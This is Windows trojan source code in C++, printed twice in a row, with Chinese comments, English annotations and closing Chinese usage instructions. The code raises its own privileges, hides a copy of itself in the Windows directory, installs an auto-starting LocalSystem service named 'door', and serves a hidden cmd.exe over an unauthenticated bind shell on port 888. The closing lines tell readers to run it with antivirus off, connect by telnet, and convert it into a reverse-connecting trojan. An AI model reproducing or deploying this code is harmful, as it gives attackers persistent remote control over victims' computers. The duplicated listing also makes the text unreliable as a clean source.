
// 实验 : Virus.exe
// 作者 : GodisCodeLife
// 完成时间 : 一周
#include <Stdio.h>
#include <Winsock2.h>
#include <Windows.h>
#include <Tlhelp32.h>
#pragma comment(lib, "Ws2_32.lib")
// Forward declarations. Two of these reuse Win32 API names with different
// parameter types (CloseHandle(DWORD) vs the SDK's CloseHandle(HANDLE),
// GetProcessId(char*) vs GetProcessId(HANDLE)); they can only coexist with
// the SDK declarations as C++ overloads, so this listing must be compiled as
// C++ (it also uses `sockaddr_in` without the struct keyword).
VOID DebugPrivilege();                    // enable SeDebugPrivilege on own token
VOID CloseHandle(DWORD dwPid);            // terminate a process by PID (not a handle close)
DWORD GetProcessId(char *szProcessName);  // PID lookup by exe name via Toolhelp
VOID EnterService();                      // install/start the "door" service
VOID Telnetdoor();                        // bind shell on TCP 888
int main(int argc, char **argv)
{
    // Entry point. Enables SeDebugPrivilege, installs/starts the "door"
    // service (EnterService), then enters the bind-shell loop (Telnetdoor).
    // Telnetdoor's outer while(TRUE) has no exit, so the CloseHandle(dwPid)
    // call and the return below are effectively unreachable.
    // argc/argv are not used.

    // Own module path; truncated below to the containing directory.
    char szCurrDir[MAX_PATH] = { 0 };
    GetModuleFileName(NULL, szCurrDir, MAX_PATH);
    int ch = '\\';
    // Points at the last backslash, i.e. "\<exe name>" — the separator
    // itself is part of the string later handed to GetProcessId.
    char *pFileName = strrchr(szCurrDir, ch);
    // Cut the path at the last separator, leaving the directory only.
    // The directory string is not used after this point.
    int nLen = strlen(szCurrDir) - strlen(pFileName);
    szCurrDir[nLen] = NULL;
    DebugPrivilege();
    EnterService();
    // PID lookup by the "\<exe name>" string above (see GetProcessId for
    // what is returned when no snapshot entry matches).
    DWORD dwPid = GetProcessId(pFileName);
    Telnetdoor();
    // Resolves to the DWORD overload defined in this file (terminate by PID),
    // not the Win32 CloseHandle(HANDLE).
    CloseHandle(dwPid);
    return 0;
}
// 提升限权
VOID DebugPrivilege()
{
    // Enables SeDebugPrivilege on the current process token — presumably so
    // that OpenProcess(PROCESS_ALL_ACCESS) in CloseHandle(DWORD) can reach
    // processes it otherwise could not. AdjustTokenPrivileges can only
    // enable a privilege the token already holds; it cannot add one.
    // No return value in this routine is checked.
    HANDLE hToken = NULL;
    // Open our own primary token with full access.
    BOOL bRet = OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hToken);
    if ( bRet == TRUE )
    {
        TOKEN_PRIVILEGES tp;
        tp.PrivilegeCount = 1;
        LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tp.Privileges[0].Luid);
        tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
        // A TRUE result here does not prove the privilege was enabled:
        // AdjustTokenPrivileges also returns TRUE (with
        // ERROR_NOT_ALL_ASSIGNED) when the token lacks it.
        AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(tp), NULL, NULL);
        // HANDLE argument: this is the Win32 CloseHandle, not the DWORD
        // overload defined later in this file.
        CloseHandle(hToken);
    }
}
// PID获取
DWORD GetProcessId(char *szProcessName)
{
    // Walks a Toolhelp process snapshot and returns the PID of the first
    // entry whose szExeFile equals szProcessName (case-sensitive strcmp).
    // dwPid is taken from pe32 unconditionally after the loop, so when
    // nothing matches the value returned is whatever th32ProcessID the last
    // successful Process32First/Next call left in pe32, not 0.
    // The snapshot handle is never closed.
    // Shares its name with the Win32 GetProcessId(HANDLE); as a C++ overload
    // it is selected by the char* argument.
    DWORD dwPid = 0;
    BOOL bRet = 0;
    PROCESSENTRY32 pe32 = { 0 };
    pe32.dwSize = sizeof(PROCESSENTRY32);   // must be set before Process32First
    // Snapshot of all processes on the system; hSnap is not checked for
    // INVALID_HANDLE_VALUE.
    HANDLE hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    // Linear search over the snapshot.
    bRet = Process32First(hSnap, &pe32);
    while ( bRet )
    {
        if ( strcmp(pe32.szExeFile, szProcessName) == 0 )
        {
            break;
        }
        bRet = Process32Next(hSnap, &pe32);
    }
    dwPid = pe32.th32ProcessID;
    return dwPid;
}
// 结束某进程
VOID CloseHandle(DWORD dwPid)
{
    // Terminates the process with PID dwPid. Despite the name this is not a
    // handle-closing routine: it is a C++ overload of Win32 CloseHandle that
    // is chosen whenever the argument is a DWORD. The inner
    // CloseHandle(hProcess) call takes a HANDLE and therefore resolves to the
    // real API. OpenProcess and TerminateProcess results are not checked.
    HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPid);
    TerminateProcess(hProcess, 0);
    CloseHandle(hProcess);
}
// 驱动木马服务自启动
VOID EnterService()
{
    // Persistence: ensures an auto-start Win32 service named "door" exists
    // that runs a copy of this executable from <Windows dir>\SystemInfo.exe.
    // Artifacts left on a host after the first run: the service entry "door"
    // (display name "door", LocalSystem, auto-start) and the hidden file
    // SystemInfo.exe in the Windows directory. OpenSCManager with
    // SC_MANAGER_ALL_ACCESS and CreateService need administrative rights;
    // none of the SCM calls are checked for failure.

    // Own path; this buffer is filled but never used (szSelfFile below is
    // what actually gets copied).
    char szFileName[MAX_PATH] = { 0 };
    GetModuleFileName(NULL, szFileName, MAX_PATH);
    // Connect to the local Service Control Manager.
    SC_HANDLE scHandle = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
    SC_HANDLE scHandleOpen = OpenService(scHandle, "door", SERVICE_ALL_ACCESS);
    // NULL is taken to mean "service not installed yet"; the error code is
    // not examined, so any other OpenService failure takes this path too.
    if ( scHandleOpen == NULL )
    {
        char szSelfFile[MAX_PATH] = { 0 };
        char szSystemPath[MAX_PATH] = { 0 };
        // Destination: %WINDIR%\SystemInfo.exe
        GetWindowsDirectory(szSystemPath, MAX_PATH);
        strcat(szSystemPath, "\\SystemInfo.exe");
        GetModuleFileName(NULL, szSelfFile, MAX_PATH);
        // bFailIfExists = FALSE: an existing SystemInfo.exe is overwritten.
        CopyFile(szSelfFile, szSystemPath, FALSE);
        SetFileAttributes(szSystemPath, FILE_ATTRIBUTE_HIDDEN);
        // Register the copy as an own-process service that starts at boot;
        // SERVICE_ERROR_IGNORE tells the SCM not to report start failures.
        SC_HANDLE scNewHandle = CreateService(scHandle,
            "door",                    // service name
            "door",                    // display name
            SERVICE_ALL_ACCESS,
            SERVICE_WIN32_OWN_PROCESS,
            SERVICE_AUTO_START,
            SERVICE_ERROR_IGNORE,
            szSystemPath,              // binary path
            NULL,
            NULL,
            NULL,
            NULL,                      // NULL account = LocalSystem
            NULL);
        // Also start it now, as a separate process from this one.
        StartService(scNewHandle, 0, NULL);
        CloseServiceHandle(scNewHandle);
    }
    // On the not-found path scHandleOpen is NULL and this call simply fails.
    CloseServiceHandle(scHandleOpen);
    CloseServiceHandle(scHandle);
}
// 实现CMD远程控制
VOID Telnetdoor()
{
    // Bind shell: listens on TCP port 888 on all interfaces, accepts a single
    // client, spawns a hidden "cmd" whose stdin/stdout/stderr are redirected
    // through two anonymous pipes, then relays cmd output to the socket and
    // socket input (one line at a time) to cmd. Any peer that can reach port
    // 888 gets the shell; there is no authentication and the traffic is
    // plaintext. The outer while(TRUE) has no exit, so WSACleanup is never
    // reached, and a client disconnect does not end the loop either (recv
    // keeps returning 0 and the loop spins). From a host-monitoring view the
    // distinctive signals are a listener on 888 and a cmd.exe child with
    // inherited pipe handles under this process.
    WSADATA wsa;
    WSAStartup(MAKEWORD(2, 2), &wsa);
    // Listening socket.
    SOCKET s = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
    // 0.0.0.0:888
    sockaddr_in sock;
    sock.sin_family = AF_INET;
    sock.sin_addr.S_un.S_addr = ADDR_ANY;
    sock.sin_port = htons(888);
    bind(s, (SOCKADDR *)&sock, sizeof(SOCKADDR));
    listen(s, 1);
    // Block until exactly one client connects; bind/listen/accept results
    // are not checked.
    sockaddr_in sockClient;
    int SaddrSize = sizeof(SOCKADDR);
    SOCKET sc = accept(s, (SOCKADDR *)&sockClient, &SaddrSize);
    // Two anonymous pipes with inheritable handles:
    //   pipe 1 (hRead1/hWrite1): cmd's stdout+stderr -> this process
    //   pipe 2 (hRead2/hWrite2): this process -> cmd's stdin
    SECURITY_ATTRIBUTES sa1, sa2;
    HANDLE hRead1, hRead2, hWrite1, hWrite2;
    sa1.nLength = sizeof(SECURITY_ATTRIBUTES);
    sa1.lpSecurityDescriptor = NULL;
    sa1.bInheritHandle = TRUE;
    sa2.nLength = sizeof(SECURITY_ATTRIBUTES);
    sa2.lpSecurityDescriptor = NULL;
    sa2.bInheritHandle = TRUE;
    CreatePipe(&hRead1, &hWrite1, &sa1, 0);
    CreatePipe(&hRead2, &hWrite2, &sa2, 0);
    // Child process with a hidden window and redirected standard handles.
    STARTUPINFO si;
    PROCESS_INFORMATION pi;
    ZeroMemory(&si, sizeof(STARTUPINFO));
    si.cb = sizeof(STARTUPINFO);
    si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
    si.wShowWindow = SW_HIDE;
    // Pipe 1 carries output, pipe 2 carries input (see above).
    si.hStdInput = hRead2;
    si.hStdOutput = hWrite1;
    si.hStdError = hWrite1;
    // lpApplicationName is NULL, so "cmd" is resolved through the search path.
    char *szCmd = "cmd";
    // bInheritHandles = TRUE so the pipe ends are visible to cmd. All four
    // pipe handles are inheritable (the parent-side ends are never marked
    // otherwise) and pi's process/thread handles are never closed.
    CreateProcess(NULL, szCmd, NULL, NULL,
        TRUE, 0, NULL, NULL, &si, &pi);
    // Relay buffers, 4 KiB each.
    DWORD dwBytes = 0;
    BOOL bRet = FALSE;
    char szBuffer[0x1000] = { 0 };
    char szCommand[0x1000] = { 0 };
    // Relay loop: polls the output pipe, otherwise blocks in recv.
    while ( TRUE )
    {
        ZeroMemory(szCommand, 0x1000);
        // Non-blocking check for pending cmd output; dwBytes receives the
        // number of bytes peeked into szBuffer (bRet itself is not examined).
        bRet = PeekNamedPipe(hRead1, szBuffer, 0x1000, &dwBytes, 0, 0);
        if ( dwBytes )
        {
            // Forward cmd output to the client as-is.
            ReadFile(hRead1, szBuffer, 0x1000, &dwBytes, NULL);
            send(sc, szBuffer, dwBytes, 0);
        }
        else
        {
            // Assemble one command line from the client. Only szBuffer[0] of
            // each recv is kept, so this relies on byte-at-a-time input
            // (telnet-style); any further bytes in the same recv are dropped.
            int i = 0;
            while ( 1 )
            {
                dwBytes = recv(sc, szBuffer, 0x1000, 0);
                if ( dwBytes <= 0)
                {
                    break;
                }
                szCommand[i++] = szBuffer[0];
                // CR or LF ends the line; it is normalized to '\n' for cmd.
                if ( szBuffer[0] == '\r' || szBuffer[0] == '\n' )
                {
                    szCommand[i-1] = '\n';
                    break;
                }
            }
            // Hand the line to cmd's stdin (i is 0 if recv returned nothing).
            WriteFile(hWrite2, szCommand, i, &dwBytes, NULL);
        }
    }
    WSACleanup();
}
// 作者 : GodisCodeLife
// 完成时间 : 一周
#include <Stdio.h>
#include <Winsock2.h>
#include <Windows.h>
#include <Tlhelp32.h>
#pragma comment(lib, "Ws2_32.lib")
// Forward declarations. Two of these reuse Win32 API names with different
// parameter types (CloseHandle(DWORD) vs the SDK's CloseHandle(HANDLE),
// GetProcessId(char*) vs GetProcessId(HANDLE)); they can only coexist with
// the SDK declarations as C++ overloads, so this listing must be compiled as
// C++ (it also uses `sockaddr_in` without the struct keyword).
VOID DebugPrivilege();                    // enable SeDebugPrivilege on own token
VOID CloseHandle(DWORD dwPid);            // terminate a process by PID (not a handle close)
DWORD GetProcessId(char *szProcessName);  // PID lookup by exe name via Toolhelp
VOID EnterService();                      // install/start the "door" service
VOID Telnetdoor();                        // bind shell on TCP 888
int main(int argc, char **argv)
{
    // Entry point. Enables SeDebugPrivilege, installs/starts the "door"
    // service (EnterService), then enters the bind-shell loop (Telnetdoor).
    // Telnetdoor's outer while(TRUE) has no exit, so the CloseHandle(dwPid)
    // call and the return below are effectively unreachable.
    // argc/argv are not used.

    // Own module path; truncated below to the containing directory.
    char szCurrDir[MAX_PATH] = { 0 };
    GetModuleFileName(NULL, szCurrDir, MAX_PATH);
    int ch = '\\';
    // Points at the last backslash, i.e. "\<exe name>" — the separator
    // itself is part of the string later handed to GetProcessId.
    char *pFileName = strrchr(szCurrDir, ch);
    // Cut the path at the last separator, leaving the directory only.
    // The directory string is not used after this point.
    int nLen = strlen(szCurrDir) - strlen(pFileName);
    szCurrDir[nLen] = NULL;
    DebugPrivilege();
    EnterService();
    // PID lookup by the "\<exe name>" string above (see GetProcessId for
    // what is returned when no snapshot entry matches).
    DWORD dwPid = GetProcessId(pFileName);
    Telnetdoor();
    // Resolves to the DWORD overload defined in this file (terminate by PID),
    // not the Win32 CloseHandle(HANDLE).
    CloseHandle(dwPid);
    return 0;
}
// 提升限权
VOID DebugPrivilege()
{
    // Enables SeDebugPrivilege on the current process token — presumably so
    // that OpenProcess(PROCESS_ALL_ACCESS) in CloseHandle(DWORD) can reach
    // processes it otherwise could not. AdjustTokenPrivileges can only
    // enable a privilege the token already holds; it cannot add one.
    // No return value in this routine is checked.
    HANDLE hToken = NULL;
    // Open our own primary token with full access.
    BOOL bRet = OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hToken);
    if ( bRet == TRUE )
    {
        TOKEN_PRIVILEGES tp;
        tp.PrivilegeCount = 1;
        LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tp.Privileges[0].Luid);
        tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
        // A TRUE result here does not prove the privilege was enabled:
        // AdjustTokenPrivileges also returns TRUE (with
        // ERROR_NOT_ALL_ASSIGNED) when the token lacks it.
        AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(tp), NULL, NULL);
        // HANDLE argument: this is the Win32 CloseHandle, not the DWORD
        // overload defined later in this file.
        CloseHandle(hToken);
    }
}
// PID获取
DWORD GetProcessId(char *szProcessName)
{
    // Walks a Toolhelp process snapshot and returns the PID of the first
    // entry whose szExeFile equals szProcessName (case-sensitive strcmp).
    // dwPid is taken from pe32 unconditionally after the loop, so when
    // nothing matches the value returned is whatever th32ProcessID the last
    // successful Process32First/Next call left in pe32, not 0.
    // The snapshot handle is never closed.
    // Shares its name with the Win32 GetProcessId(HANDLE); as a C++ overload
    // it is selected by the char* argument.
    DWORD dwPid = 0;
    BOOL bRet = 0;
    PROCESSENTRY32 pe32 = { 0 };
    pe32.dwSize = sizeof(PROCESSENTRY32);   // must be set before Process32First
    // Snapshot of all processes on the system; hSnap is not checked for
    // INVALID_HANDLE_VALUE.
    HANDLE hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    // Linear search over the snapshot.
    bRet = Process32First(hSnap, &pe32);
    while ( bRet )
    {
        if ( strcmp(pe32.szExeFile, szProcessName) == 0 )
        {
            break;
        }
        bRet = Process32Next(hSnap, &pe32);
    }
    dwPid = pe32.th32ProcessID;
    return dwPid;
}
// 结束某进程
VOID CloseHandle(DWORD dwPid)
{
    // Terminates the process with PID dwPid. Despite the name this is not a
    // handle-closing routine: it is a C++ overload of Win32 CloseHandle that
    // is chosen whenever the argument is a DWORD. The inner
    // CloseHandle(hProcess) call takes a HANDLE and therefore resolves to the
    // real API. OpenProcess and TerminateProcess results are not checked.
    HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPid);
    TerminateProcess(hProcess, 0);
    CloseHandle(hProcess);
}
// 驱动木马服务自启动
VOID EnterService()
{
    // Persistence: ensures an auto-start Win32 service named "door" exists
    // that runs a copy of this executable from <Windows dir>\SystemInfo.exe.
    // Artifacts left on a host after the first run: the service entry "door"
    // (display name "door", LocalSystem, auto-start) and the hidden file
    // SystemInfo.exe in the Windows directory. OpenSCManager with
    // SC_MANAGER_ALL_ACCESS and CreateService need administrative rights;
    // none of the SCM calls are checked for failure.

    // Own path; this buffer is filled but never used (szSelfFile below is
    // what actually gets copied).
    char szFileName[MAX_PATH] = { 0 };
    GetModuleFileName(NULL, szFileName, MAX_PATH);
    // Connect to the local Service Control Manager.
    SC_HANDLE scHandle = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
    SC_HANDLE scHandleOpen = OpenService(scHandle, "door", SERVICE_ALL_ACCESS);
    // NULL is taken to mean "service not installed yet"; the error code is
    // not examined, so any other OpenService failure takes this path too.
    if ( scHandleOpen == NULL )
    {
        char szSelfFile[MAX_PATH] = { 0 };
        char szSystemPath[MAX_PATH] = { 0 };
        // Destination: %WINDIR%\SystemInfo.exe
        GetWindowsDirectory(szSystemPath, MAX_PATH);
        strcat(szSystemPath, "\\SystemInfo.exe");
        GetModuleFileName(NULL, szSelfFile, MAX_PATH);
        // bFailIfExists = FALSE: an existing SystemInfo.exe is overwritten.
        CopyFile(szSelfFile, szSystemPath, FALSE);
        SetFileAttributes(szSystemPath, FILE_ATTRIBUTE_HIDDEN);
        // Register the copy as an own-process service that starts at boot;
        // SERVICE_ERROR_IGNORE tells the SCM not to report start failures.
        SC_HANDLE scNewHandle = CreateService(scHandle,
            "door",                    // service name
            "door",                    // display name
            SERVICE_ALL_ACCESS,
            SERVICE_WIN32_OWN_PROCESS,
            SERVICE_AUTO_START,
            SERVICE_ERROR_IGNORE,
            szSystemPath,              // binary path
            NULL,
            NULL,
            NULL,
            NULL,                      // NULL account = LocalSystem
            NULL);
        // Also start it now, as a separate process from this one.
        StartService(scNewHandle, 0, NULL);
        CloseServiceHandle(scNewHandle);
    }
    // On the not-found path scHandleOpen is NULL and this call simply fails.
    CloseServiceHandle(scHandleOpen);
    CloseServiceHandle(scHandle);
}
// 实现CMD远程控制
VOID Telnetdoor()
{
    // Bind shell: listens on TCP port 888 on all interfaces, accepts a single
    // client, spawns a hidden "cmd" whose stdin/stdout/stderr are redirected
    // through two anonymous pipes, then relays cmd output to the socket and
    // socket input (one line at a time) to cmd. Any peer that can reach port
    // 888 gets the shell; there is no authentication and the traffic is
    // plaintext. The outer while(TRUE) has no exit, so WSACleanup is never
    // reached, and a client disconnect does not end the loop either (recv
    // keeps returning 0 and the loop spins). From a host-monitoring view the
    // distinctive signals are a listener on 888 and a cmd.exe child with
    // inherited pipe handles under this process.
    WSADATA wsa;
    WSAStartup(MAKEWORD(2, 2), &wsa);
    // Listening socket.
    SOCKET s = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
    // 0.0.0.0:888
    sockaddr_in sock;
    sock.sin_family = AF_INET;
    sock.sin_addr.S_un.S_addr = ADDR_ANY;
    sock.sin_port = htons(888);
    bind(s, (SOCKADDR *)&sock, sizeof(SOCKADDR));
    listen(s, 1);
    // Block until exactly one client connects; bind/listen/accept results
    // are not checked.
    sockaddr_in sockClient;
    int SaddrSize = sizeof(SOCKADDR);
    SOCKET sc = accept(s, (SOCKADDR *)&sockClient, &SaddrSize);
    // Two anonymous pipes with inheritable handles:
    //   pipe 1 (hRead1/hWrite1): cmd's stdout+stderr -> this process
    //   pipe 2 (hRead2/hWrite2): this process -> cmd's stdin
    SECURITY_ATTRIBUTES sa1, sa2;
    HANDLE hRead1, hRead2, hWrite1, hWrite2;
    sa1.nLength = sizeof(SECURITY_ATTRIBUTES);
    sa1.lpSecurityDescriptor = NULL;
    sa1.bInheritHandle = TRUE;
    sa2.nLength = sizeof(SECURITY_ATTRIBUTES);
    sa2.lpSecurityDescriptor = NULL;
    sa2.bInheritHandle = TRUE;
    CreatePipe(&hRead1, &hWrite1, &sa1, 0);
    CreatePipe(&hRead2, &hWrite2, &sa2, 0);
    // Child process with a hidden window and redirected standard handles.
    STARTUPINFO si;
    PROCESS_INFORMATION pi;
    ZeroMemory(&si, sizeof(STARTUPINFO));
    si.cb = sizeof(STARTUPINFO);
    si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
    si.wShowWindow = SW_HIDE;
    // Pipe 1 carries output, pipe 2 carries input (see above).
    si.hStdInput = hRead2;
    si.hStdOutput = hWrite1;
    si.hStdError = hWrite1;
    // lpApplicationName is NULL, so "cmd" is resolved through the search path.
    char *szCmd = "cmd";
    // bInheritHandles = TRUE so the pipe ends are visible to cmd. All four
    // pipe handles are inheritable (the parent-side ends are never marked
    // otherwise) and pi's process/thread handles are never closed.
    CreateProcess(NULL, szCmd, NULL, NULL,
        TRUE, 0, NULL, NULL, &si, &pi);
    // Relay buffers, 4 KiB each.
    DWORD dwBytes = 0;
    BOOL bRet = FALSE;
    char szBuffer[0x1000] = { 0 };
    char szCommand[0x1000] = { 0 };
    // Relay loop: polls the output pipe, otherwise blocks in recv.
    while ( TRUE )
    {
        ZeroMemory(szCommand, 0x1000);
        // Non-blocking check for pending cmd output; dwBytes receives the
        // number of bytes peeked into szBuffer (bRet itself is not examined).
        bRet = PeekNamedPipe(hRead1, szBuffer, 0x1000, &dwBytes, 0, 0);
        if ( dwBytes )
        {
            // Forward cmd output to the client as-is.
            ReadFile(hRead1, szBuffer, 0x1000, &dwBytes, NULL);
            send(sc, szBuffer, dwBytes, 0);
        }
        else
        {
            // Assemble one command line from the client. Only szBuffer[0] of
            // each recv is kept, so this relies on byte-at-a-time input
            // (telnet-style); any further bytes in the same recv are dropped.
            int i = 0;
            while ( 1 )
            {
                dwBytes = recv(sc, szBuffer, 0x1000, 0);
                if ( dwBytes <= 0)
                {
                    break;
                }
                szCommand[i++] = szBuffer[0];
                // CR or LF ends the line; it is normalized to '\n' for cmd.
                if ( szBuffer[0] == '\r' || szBuffer[0] == '\n' )
                {
                    szCommand[i-1] = '\n';
                    break;
                }
            }
            // Hand the line to cmd's stdin (i is 0 if recv returned nothing).
            WriteFile(hWrite2, szCommand, i, &dwBytes, NULL);
        }
    }
    WSACleanup();
}
编译连接运行这个木马(关闭杀毒软件), 然后打开CMD,用Telnet命令连接这个木马。
如果不会Telnet命令的朋友可以上网查找详细用法。
事例: Telnet 中木马的IP地址 888
由于程序中绑定的是888端口,所以必须连接888端口才有效。
如果有能力的学友,可以将其更改成反弹式木马,那样就更完美了。